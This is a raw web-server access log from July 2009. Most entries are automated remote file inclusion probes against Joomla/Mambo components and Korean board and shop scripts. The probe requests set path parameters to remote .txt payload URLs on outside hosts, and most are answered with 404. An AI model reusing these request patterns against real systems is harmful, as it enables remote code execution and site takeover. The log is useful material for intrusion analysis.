200.103.16.12 - - [28/Jul/2009:05:48:52 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:48:52 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:49:38 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:49:38 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:49:38 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:51:12 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:05:51:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.103.16.12 - - [28/Jul/2009:05:52:26 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:52:26 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:52:26 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:52:50 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jul/2009:05:53:21 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.202.2.220 - - [28/Jul/2009:05:53:21 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.202.2.220 - - [28/Jul/2009:05:53:21 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.202.2.220 - - [28/Jul/2009:05:53:23 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.202.2.220 - - [28/Jul/2009:05:53:23 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.202.2.220 - - [28/Jul/2009:05:53:24 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.202.2.220 - - [28/Jul/2009:05:53:30 -0400] "GET /logs/access_log.Q109071900//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.103.16.12 - - [28/Jul/2009:05:53:31 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jul/2009:05:53:46 -0400] "GET /logs/access_log.Q109071900//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.202.2.220 - - [28/Jul/2009:05:54:01 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
211.202.2.220 - - [28/Jul/2009:05:54:02 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
211.202.2.220 - - [28/Jul/2009:05:54:02 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
211.202.2.220 - - [28/Jul/2009:05:54:09 -0400] "GET /logs/access_log.Q109071900//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
110.45.139.125 - - [28/Jul/2009:05:54:59 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:54:59 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:54:59 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:05 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:05 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:05 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:55:05 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:55:15 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:55:15 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:55:15 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:17 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:55:23 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:23 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:23 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:23 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:31 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:48 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:48 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:48 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.232.224.65 - - [28/Jul/2009:05:55:50 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:05:56:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.204 - - [28/Jul/2009:05:57:13 -0400] "GET /images/over-index12_drills.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
89.149.194.189 - - [28/Jul/2009:05:57:26 -0400] "GET //config/dbutil.bck.php?confdir=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
74.55.30.194 - - [28/Jul/2009:05:57:47 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:47 -0400] "GET //include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:47 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:47 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:47 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:47 -0400] "GET //include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:53 -0400] "GET //include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:53 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:53 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:53 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:53 -0400] "GET //include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:57:53 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
205.234.161.171 - - [28/Jul/2009:05:57:58 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
205.234.161.171 - - [28/Jul/2009:05:57:58 -0400] "GET //include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
205.234.161.171 - - [28/Jul/2009:05:57:58 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.149.194.189 - - [28/Jul/2009:05:58:14 -0400] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
74.55.30.194 - - [28/Jul/2009:05:58:15 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:58:21 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:58:21 -0400] "GET /logs/access_log.Q109070200%20%20//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:58:23 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:58:23 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:58:23 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:05:58:26 -0400] "GET /logs/access_log.Q109070200%20%20//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:05:58:29 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
74.6.22.169 - - [28/Jul/2009:05:59:05 -0400] "GET /logs/access_log.Q109041000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.98.134.54 - - [28/Jul/2009:05:59:05 -0400] "GET //stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:05:59:05 -0400] "GET /logs/access_log.Q109051800//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:05:59:05 -0400] "GET /logs//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:05:59:05 -0400] "GET /logs/access_log.Q109061600//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jul/2009:05:59:09 -0400] "GET /logs/error_log.Q109071800//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.55.30.194 - - [28/Jul/2009:06:00:06 -0400] "GET //include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:06:00:06 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:06:00:06 -0400] "GET //include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:06:00:06 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:06:00:06 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:06:00:06 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jul/2009:06:00:10 -0400] "GET /logs/access_log.Q109071400//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
66.98.134.54 - - [28/Jul/2009:06:00:18 -0400] "GET //stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:00:18 -0400] "GET /logs/access_log.Q109061600//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:00:18 -0400] "GET /logs//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:00:18 -0400] "GET //stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:00:18 -0400] "GET /logs//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:00:18 -0400] "GET /logs/access_log.Q109051800//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:00:18 -0400] "GET /logs/access_log.Q109051800//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:00:18 -0400] "GET /logs/access_log.Q109061600//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.50.143.90 - - [28/Jul/2009:06:00:22 -0400] "GET /logs/access_log.Q109061700////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
92.50.143.90 - - [28/Jul/2009:06:00:22 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
92.50.143.90 - - [28/Jul/2009:06:00:22 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 11341 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
92.50.143.90 - - [28/Jul/2009:06:00:27 -0400] "GET /logs/access_log.Q109060400////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
92.50.143.90 - - [28/Jul/2009:06:00:29 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 454 "-" "libwww-perl/5.803"
92.50.143.90 - - [28/Jul/2009:06:00:29 -0400] "GET /logs/access_log.Q109061700////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
92.50.143.90 - - [28/Jul/2009:06:00:30 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 11341 "-" "libwww-perl/5.803"
74.55.30.194 - - [28/Jul/2009:06:00:33 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:06:00:35 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
92.50.143.90 - - [28/Jul/2009:06:00:36 -0400] "GET /logs/access_log.Q109060400////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
110.45.139.125 - - [28/Jul/2009:06:00:54 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jul/2009:06:00:55 -0400] "GET /logs/access_log.Q109071400//bbs//skin/ggambo7002_board/write.php?dir=http//www.hanyeong.ac.kr//bbs//super.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
110.45.139.125 - - [28/Jul/2009:06:01:01 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:06:01:01 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
110.45.139.125 - - [28/Jul/2009:06:01:01 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infochivilcoy.com/union/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.149.194.189 - - [28/Jul/2009:06:01:12 -0400] "GET /logs/access_log.Q109061700//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
89.149.194.189 - - [28/Jul/2009:06:01:13 -0400] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
